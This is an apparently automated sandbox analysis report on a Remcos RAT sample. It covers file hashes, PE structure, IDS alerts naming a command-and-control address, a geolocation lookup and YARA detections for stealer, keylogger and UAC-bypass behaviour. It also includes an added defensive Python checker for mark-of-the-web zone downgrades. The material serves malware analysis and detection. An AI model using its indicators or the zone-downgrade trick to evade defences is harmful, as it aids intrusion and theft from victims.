                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):963
                                                Entropy (8bit):5.019205124979377
                                                Encrypted:false
                                                SSDEEP:12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlupdVauKyGX85jvXhNlT3/7AcV9Wro
                                                MD5:B62617530A8532F9AECAA939B6AB93BB
                                                SHA1:E4DE9E9838052597EB2A5B363654C737BA1E6A66
                                                SHA-256:508F952EF83C41861ECD44FB821F7BB73535BFF89F54D54C3549127DCA004E70
                                                SHA-512:A0B385593B721313130CF14182F3B6EE5FF29D2A36FED99139FA2EE838002DFEEC83285DEDEAE437A53D053FCC631AEAD001D3E804386211BBA2F174134EA70D
                                                Malicious:false
                                                Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                Process:C:\Users\user\Desktop\yPIOW6yoPi.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):397312
                                                Entropy (8bit):7.59779116665988
                                                Encrypted:false
                                                SSDEEP:6144:pvesyWj0MhFpikvYFmSkoxT88KaUqcZLROqNwlggoWLOEC:pesyY0M3xvYDY8KgchIvlgXWy
                                                MD5:A0ACD7920F09A59331E008F8D3DC7AC1
                                                SHA1:F6BF51B2BCCC91476136E43A91B17076ED78B083
                                                SHA-256:4D8F242A1D64B3B41748D2BD56EE6F7119434DEDCDF793A83CEA95FB31D13347
                                                SHA-512:10AA260961DF5472B9B79A72FB9AB1A4EA9C088C817DB107F9355FBB7B6B3369B17127933EAD6B10A01E4270E3F533E37699EEB77DD084D8821D47C5FC5C870E
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 71%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........'...I..I..I.....I.....I....".I.d2..I..H..I.....I.....I.....I.Rich..I.................PE..L...LB.d.................p..........JK............@.........................................................................<v..P....0...:..............................................................@............................................text...zo.......p.................. ..`.data............`...t..............@....rsrc........0...<..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\yPIOW6yoPi.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Preview:[ZoneTransfer]....ZoneId=0
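The 26-byte record above is the text of a Zone.Identifier alternate data stream, the mark-of-the-web that Windows attaches to downloaded files, and the report lists it as modified by the sample and marks it malicious. Browsers write ZoneId=3 (Internet); a stream rewritten to ZoneId=0 (Local Machine) makes the file look local, so SmartScreen and Office Protected View no longer apply to it. As an added example that is not part of the Joe Sandbox report, here is a Python parser for that stream with a check that reports a zone downgrade. The report's 26 bytes are embedded as one input; the second stream (with ReferrerUrl and HostUrl, placeholder URLs) is constructed for the test, and the file the stream belonged to is not named in the report, so the script takes a path only on the command line.

```python
from typing import Optional

# URL security zone ids as stored in the ZoneId value of a Zone.Identifier stream.
ZONE_NAMES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites",
              3: "Internet", 4: "Restricted Sites"}

# The 26-byte stream content shown in the report (CRLF line endings, blank line included).
REPORT_STREAM = "[ZoneTransfer]\r\n\r\nZoneId=0"

# Constructed example of what a browser writes for a download; the URLs are placeholders.
BROWSER_STREAM = ("[ZoneTransfer]\r\nZoneId=3\r\n"
                  "ReferrerUrl=https://example.invalid/download\r\n"
                  "HostUrl=https://cdn.example.invalid/tool.exe\r\n")


def parse_zone_identifier(stream: str) -> dict:
    """Parse the INI-style [ZoneTransfer] section; keys outside it and unknown keys are ignored."""
    section = None
    fields = {}
    for raw in stream.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "ZoneTransfer" and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip()] = value.strip()
    zone = fields.get("ZoneId")
    return {"zone_id": int(zone) if zone is not None and zone.isdigit() else None,
            "referrer_url": fields.get("ReferrerUrl"),
            "host_url": fields.get("HostUrl")}


def assess_motw(stream: Optional[str], expected_zone: int = 3) -> dict:
    """Compare the stored zone with the zone a download should carry (3 = Internet).
    A lower id means the mark was downgraded or rewritten, which is what switches off
    the SmartScreen and Protected View handling keyed on the Internet zone."""
    info = parse_zone_identifier(stream or "")
    zone = info["zone_id"]
    if zone is None:
        verdict = "no-motw"
    elif zone < expected_zone:
        verdict = "downgraded"
    else:
        verdict = "intact"
    info["zone_name"] = ZONE_NAMES.get(zone, "unknown") if zone is not None else None
    info["verdict"] = verdict
    return info


def read_zone_identifier(path: str) -> Optional[str]:
    """Read <path>:Zone.Identifier from NTFS (Windows only); None when the stream is absent."""
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return None


if __name__ == "__main__":
    import sys
    stream = read_zone_identifier(sys.argv[1]) if len(sys.argv) > 1 else REPORT_STREAM
    print(assess_motw(stream))
```

On a live host, run it against the dropped executable's path; a file that a browser downloaded but that now reads ZoneId=0, or has no stream at all although the download history says it came from the Internet, is the artifact to chase.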
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:MS Windows registry file, NT/2000 or above
                                                Category:dropped
                                                Size (bytes):1835008
                                                Entropy (8bit):4.471256298754677
                                                Encrypted:false
                                                SSDEEP:6144:wzZfpi6ceLPx9skLmb0f9ZWSP3aJG8nAgeiJRMMhA2zX4WABluuNWjDH5S:mZHt9ZWOKnMM6bFpIj4
                                                MD5:C84AF8F2EAA7444133C6C36476D0E913
                                                SHA1:9FCFCA2ED566048516D46EC54228A1D4B61F3750
                                                SHA-256:96CA419B052BCB7F7100D6A5CD1922A11AC6D5E21CCFF99E1FFC4EFE7340E96A
                                                SHA-512:E292B36A793D1C4E21B586D3725979332DAF8D1AB0657EBC235310E109C5234F3498BF6E68D679632A9DF08CF46C4B66AF44B52B1CBBF3E3C5B1D3B8CBA6AFE8
                                                Malicious:false
                                                Preview:regfS...S....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..o.c.................................................................................................................................................................................................................................................................................................................................................[........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.59779116665988
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:yPIOW6yoPi.exe
                                                File size:397'312 bytes
                                                MD5:a0acd7920f09a59331e008f8d3dc7ac1
                                                SHA1:f6bf51b2bccc91476136e43a91b17076ed78b083
                                                SHA256:4d8f242a1d64b3b41748d2bd56ee6f7119434dedcdf793a83cea95fb31d13347
                                                SHA512:10aa260961df5472b9b79a72fb9ab1a4ea9c088c817db107f9355fbb7b6b3369b17127933ead6b10a01e4270e3f533e37699eeb77dd084d8821d47c5fc5c870e
                                                SSDEEP:6144:pvesyWj0MhFpikvYFmSkoxT88KaUqcZLROqNwlggoWLOEC:pesyY0M3xvYDY8KgchIvlgXWy
                                                TLSH:3C840292B9A0C031D4AA25B10830CFE16ABF7E726678A54F7B5527BD5F312C3563A343
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........'...I...I...I.......I.......I.....".I..d2...I...H...I.......I.......I.......I.Rich..I.................PE..L...LB.d...........
                                                Icon Hash:0ca3032505099544
                                                Entrypoint:0x404b4a
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x64C8424C [Mon Jul 31 23:22:52 2023 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:0
                                                File Version Major:5
                                                File Version Minor:0
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:0
                                                Import Hash:321f975ee8f8e533eb0cddbd63fede6f
                                                Instruction
                                                call 00007F9BB0B3E60Fh
                                                jmp 00007F9BB0B39C8Dh
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                call 00007F9BB0B39E4Ch
                                                xchg cl, ch
                                                jmp 00007F9BB0B39E34h
                                                call 00007F9BB0B39E43h
                                                fxch st(0), st(1)
                                                jmp 00007F9BB0B39E2Bh
                                                fabs
                                                fld1
                                                mov ch, cl
                                                xor cl, cl
                                                jmp 00007F9BB0B39E21h
                                                mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                fabs
                                                fxch st(0), st(1)
                                                fabs
                                                fxch st(0), st(1)
                                                fpatan
                                                or cl, cl
                                                je 00007F9BB0B39E16h
                                                fldpi
                                                fsubrp st(1), st(0)
                                                or ch, ch
                                                je 00007F9BB0B39E14h
                                                fchs
                                                ret
                                                fabs
                                                fld st(0), st(0)
                                                fld st(0), st(0)
                                                fld1
                                                fsubrp st(1), st(0)
                                                fxch st(0), st(1)
                                                fld1
                                                faddp st(1), st(0)
                                                fmulp st(1), st(0)
                                                ftst
                                                wait
                                                fstsw word ptr [ebp-000000A0h]
                                                wait
                                                test byte ptr [ebp-0000009Fh], 00000001h
                                                jne 00007F9BB0B39E17h
                                                xor ch, ch
                                                fsqrt
                                                ret
                                                pop eax
                                                jmp 00007F9BB0B3E7CFh
                                                fstp st(0)
                                                fld tbyte ptr [0045869Ah]
                                                ret
                                                fstp st(0)
                                                or cl, cl
                                                je 00007F9BB0B39E1Dh
                                                fstp st(0)
                                                fldpi
                                                or ch, ch
                                                je 00007F9BB0B39E14h
                                                fchs
                                                ret
                                                fstp st(0)
                                                fldz
                                                or ch, ch
                                                je 00007F9BB0B39E09h
                                                fchs
                                                ret
                                                fstp st(0)
                                                jmp 00007F9BB0B3E7A5h
                                                fstp st(0)
                                                mov cl, ch
                                                jmp 00007F9BB0B39E12h
                                                call 00007F9BB0B39DDEh
                                                jmp 00007F9BB0B3E7B0h
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                push ebp
                                                Programming Language:
                                                • [C++] VS2008 build 21022
                                                • [ASM] VS2008 build 21022
                                                • [ C ] VS2008 build 21022
                                                • [IMP] VS2005 build 50727
                                                • [RES] VS2008 build 21022
                                                • [LNK] VS2008 build 21022
                                                 Name                                  Virtual Address  Virtual Size  Is in Section
                                                 IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                 IMAGE_DIRECTORY_ENTRY_IMPORT          0x5763c          0x50          .text
                                                 IMAGE_DIRECTORY_ENTRY_RESOURCE        0x63000          0x3a10        .rsrc
                                                 IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                 IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                 IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
                                                 IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                 IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                 IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                 IMAGE_DIRECTORY_ENTRY_TLS             0x2ee0           0x18          .text
                                                 IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x2e98           0x40          .text
                                                 IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                 IMAGE_DIRECTORY_ENTRY_IAT             0x1000           0x190         .text
                                                 IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                 IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                 IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                 Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                 .text | 0x1000 | 0x56f7a | 0x57000 | 08c4816808d171190b4258aa3969cf67 | False | 0.9045859150502874 | data | 7.875500118800945 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                 .data | 0x58000 | 0xaba8 | 0x6000 | cb7d393e431e25bf07903ec367256258 | False | 0.0806884765625 | Matlab v4 mat-file (little endian) n2, rows 2, columns 0 | 0.9660636451204884 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                 .rsrc | 0x63000 | 0x1ba10 | 0x3c00 | 2d7812dc3b9e84c8ab17f99a0b23a768 | False | 0.5729166666666666 | data | 5.137179330881923 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x631e0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Romanian | Romania | 0.5702764976958525
RT_ICON | 0x638a8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Romanian | Romania | 0.595954356846473
RT_ICON | 0x65e50 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Romanian | Romania | 0.6542553191489362
RT_STRING | 0x66570 | 0x49a | data | Romanian | Romania | 0.4456706281833616
RT_ACCELERATOR | 0x662e8 | 0x50 | data | Romanian | Romania | 0.825
RT_GROUP_ICON | 0x662b8 | 0x30 | data | Romanian | Romania | 0.9375
RT_VERSION | 0x66338 | 0x238 | data | | | 0.5246478873239436
DLL | Import
KERNEL32.dll | WriteConsoleInputW, SetComputerNameExA, EnumCalendarInfoW, InterlockedDecrement, GetCurrentProcess, InterlockedCompareExchange, GetModuleHandleW, EnumCalendarInfoExW, GetWindowsDirectoryA, EnumTimeFormatsW, ReadConsoleInputA, CopyFileW, GetConsoleAliasExesLengthW, VerifyVersionInfoA, FindNextVolumeMountPointW, GetShortPathNameA, LCMapStringA, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, SetLastError, GetProcAddress, VirtualAlloc, GetAtomNameA, LoadLibraryA, CreateSemaphoreW, InterlockedExchangeAdd, OpenEventA, GetCommMask, GlobalUnWire, FreeEnvironmentStringsW, EnumDateFormatsW, SetCalendarInfoA, GetVersionExA, TerminateJobObject, GetCurrentProcessId, CreateFileA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCommandLineA, GetStartupInfoA, TerminateProcess, IsDebuggerPresent, HeapAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, Sleep, HeapSize, ExitProcess, MultiByteToWideChar, ReadFile, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, HeapFree, WriteFile, GetModuleFileNameA, SetFilePointer, CloseHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, RaiseException, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetModuleHandleA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW
ole32.dll | CoSuspendClassObjects
WINHTTP.dll | WinHttpCheckPlatform
Language of compilation system | Country where language is spoken
Romanian | Romania
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T06:12:49.237371+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49753 | 198.23.227.212 | 32583 | TCP
2025-01-11T06:13:01.128869+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.6 | 49828 | 178.237.33.50 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 06:13:00.475275040 CET | 50495 | 53 | 192.168.2.6 | 1.1.1.1
Jan 11, 2025 06:13:00.483243942 CET | 53 | 50495 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 06:13:00.475275040 CET | 192.168.2.6 | 1.1.1.1 | 0xa87d | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 06:13:00.483243942 CET | 1.1.1.1 | 192.168.2.6 | 0xa87d | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49828 | 178.237.33.50 | 80 | 1512 | C:\Users\user\AppData\Roaming\xenor\yavascript.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:13:00.498894930 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Jan 11, 2025 06:13:01.126374006 CET | 1171 | IN | HTTP/1.1 200 OK
                                                date: Sat, 11 Jan 2025 05:13:01 GMT
                                                server: Apache
                                                content-length: 963
                                                content-type: application/json; charset=utf-8
                                                cache-control: public, max-age=300
                                                access-control-allow-origin: *
                                                Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                                                Target ID:0
                                                Start time:00:12:36
                                                Start date:11/01/2025
                                                Path:C:\Users\user\Desktop\yPIOW6yoPi.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\yPIOW6yoPi.exe"
                                                Imagebase:0x400000
                                                File size:397'312 bytes
                                                MD5 hash:A0ACD7920F09A59331E008F8D3DC7AC1
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2295009749.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2295191627.00000000005A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                Reputation:low
                                                Has exited:true

                                                Target ID:4
                                                Start time:00:12:38
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1000
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:6
                                                Start time:00:12:40
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1008
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:8
                                                Start time:00:12:41
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1112
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:00:12:42
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1120
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:12
                                                Start time:00:12:43
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1116
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:14
                                                Start time:00:12:44
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1120
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:16
                                                Start time:00:12:45
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1044
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:17
                                                Start time:00:12:46
                                                Start date:11/01/2025
                                                Path:C:\Users\user\AppData\Roaming\xenor\yavascript.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
                                                Imagebase:0x400000
                                                File size:397'312 bytes
                                                MD5 hash:A0ACD7920F09A59331E008F8D3DC7AC1
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.4625247428.000000000084E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000011.00000002.4624113726.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
